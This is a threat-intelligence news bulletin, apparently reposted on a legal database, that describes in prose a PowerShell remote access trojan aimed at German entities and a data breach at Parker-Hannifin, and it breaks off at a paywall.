Ankura CTIX FLASH Update - May 17, 2022

Published date20 June 2022
Subject MatterPrivacy, Technology, Data Protection, Security
Law FirmAnkura Consulting Group LLC
AuthorAnkura Consulting Group LLC

Ransomware/Malware Activity

German Entities Targeted with PowerShell RAT

Threat actors are actively targeting German entities with custom PowerShell payloads to gather information about the ongoing conflict between Russia and Ukraine. The malicious remote access trojan (RAT) is masked as a downloadable reporting document on a clone site mimicking the official Baden-Württemberg website. Once downloaded, the user is met with a fake error message stating an error in the application, while in the background a PowerShell Base64 command is being executed to reach out to actor-controlled nodes of the fake website and download the associated payloads. Once completed, files "MonitorHealth.cmd" and "Status.txt" are dropped onto the compromised system. A scheduled tasking is set within the payload to execute "MonitorHealth.cmd" at a specific time each day to validate persistence on the system. "Status.txt" is a PowerShell RAT which collects device information such as current username, active working directory, and the device hostname, which is all paired with a unique user identifier. This information is exfiltrated in JSON format and sent to threat actor endpoints via HTTP POST requests. Built in security features allow the RAT to test the anti-virus and security measures within its current environment, avoiding the Windows Antimalware Scan Interface (AMSI) by utilizing a bypass function script. Indicators reveal that one of the command-and-control nodes where the POST information is exfiltrated to is "kleinm[.]de". Currently indicators do not tie any one actor to this PowerShell RAT, however CTIX analysts continue to monitor any chatter about this activity and will provide updates accordingly.

  • Malwarebytes: PowerShell RAT

Threat Actor Activity

Motion and Control Technologies Corporation Discloses Data Breach Impacting Employees, Dependents, and More

Parker-Hannifin, a corporation based in Ohio that specializes in motion and control technologies, recently disclosed a data breach that exposed the personal information of employees. According to Parker, an unauthorized third party had access to the corporation's IT systems between March 11 and March 14 and, "may have acquired certain files." containing data pertaining to "current and former employees, their dependents, and members of Parker's Group Health Plans (including health plans sponsored by an entity acquired by Parker)." The data included names, Social Security numbers (SSNs), dates of birth, addresses...

To continue reading

Request your trial

VLEX uses login cookies to provide you with a better browsing experience. If you click on 'Accept' or continue browsing this site we consider that you accept our cookie policy. ACCEPT